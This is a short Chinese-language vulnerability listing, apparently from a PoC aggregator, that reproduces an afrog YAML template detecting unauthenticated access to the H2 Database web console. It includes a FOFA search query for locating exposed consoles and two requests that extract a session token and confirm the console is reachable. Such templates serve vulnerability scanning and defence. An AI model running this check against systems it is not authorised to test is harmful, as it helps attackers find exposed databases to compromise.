h2-database-web-console-unauthorized-access: H2 Database Web Console Unauthorized Access

日期: 2025-08-01 | 影响软件: H2 Database Web Console | POC: 已公开

漏洞描述

fofa: H2-Console

PoC代码[已公开]

id: h2-database-web-console-unauthorized-access

info:
  name: H2 Database Web Console Unauthorized Access
  author: jujumanman
  severity: high
  verified: true
  description: |-
    fofa: H2-Console
  tags: h2,console,unauth
  created: 2023/07/07

rules:
  r0:
    request:
      method: GET
      path: /h2-console
      follow_redirects: true
    expression: response.status == 200 && response.body.bcontains(b"Welcome to H2")
    output:
      search: '"location.href = ''(?P<token>.+?)''".bsubmatch(response.body)'
      token: search["token"]
  r1:
    request:
      method: GET
      path: /h2-console/{{token}}
    expression: response.status == 200 && response.body.bcontains(b"Generic H2")
expression: r0() && r1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/unauthorized/h2-database-web-console-unauthorized-access.yaml